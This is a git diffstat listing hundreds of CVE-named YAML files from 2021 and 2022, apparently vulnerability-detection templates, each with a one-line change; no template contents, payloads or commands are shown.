http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24522.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24657.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24681.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24876.yaml | 2 +- http/cves/2021/CVE-2021-24878.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24934.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25032.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25082.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25161.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26599.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27858.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-27964.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28799.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-3007.yaml | 2 +- http/cves/2021/CVE-2021-30116.yaml | 2 +- http/cves/2021/CVE-2021-30118.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30203.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-31316.yaml | 2 +- http/cves/2021/CVE-2021-31324.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32478.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3287.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33045.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33558.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33829.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34622.yaml | 2 +- http/cves/2021/CVE-2021-34624.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36646.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37292.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37598.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38146.yaml | 2 +- http/cves/2021/CVE-2021-38147.yaml | 2 +- http/cves/2021/CVE-2021-38154.yaml | 2 +- http/cves/2021/CVE-2021-3831.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39341.yaml | 2 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39411.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40272.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41691.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43831.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 2 +- http/cves/2021/CVE-2021-44260.yaml | 2 +- http/cves/2021/CVE-2021-4436.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-4448.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-4462.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45027.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45420.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45467.yaml | 2 +- http/cves/2021/CVE-2021-45793.yaml | 2 +- http/cves/2021/CVE-2021-45811.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46104.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46418.yaml | 2 +- http/cves/2021/CVE-2021-46419.yaml | 2 +- http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0250.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 +- http/cves/2022/CVE-2022-0429.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0592.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0666.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0765.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0783.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0873.yaml | 2 +- http/cves/2022/CVE-2022-0879.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1026.yaml | 2 +- http/cves/2022/CVE-2022-1029.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1580.yaml | 2 +- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1950.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2130.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-2168.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23397.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2373.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24086.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-2461.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-24627.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24819.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25322.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-2552.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-26271.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26585.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27924.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-27985.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28508.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28666.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29013.yaml | 2 +- http/cves/2022/CVE-2022-29081.yaml | 2 +- http/cves/2022/CVE-2022-29316.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-31101.yaml | 2 +- http/cves/2022/CVE-2022-31260.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31470.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31711.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 2 +- http/cves/2022/CVE-2022-31975.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33198.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34305.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34487.yaml | 2 +- http/cves/2022/CVE-2022-34534.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-3477.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35507.yaml | 2 +- http/cves/2022/CVE-2022-3590.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-36923.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3766.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-37932.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-3805.yaml | 2 +- http/cves/2022/CVE-2022-38130.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 2 +- http/cves/2022/CVE-2022-38295.yaml | 2 +- http/cves/2022/CVE-2022-38296.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38627.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-3869.yaml | 2 +- http/cves/2022/CVE-2022-38812.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-40624.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-41800.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42095.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42118.yaml | 2 +- http/cves/2022/CVE-2022-42149.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4306.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4320.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4375.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-43939.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-44356.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- 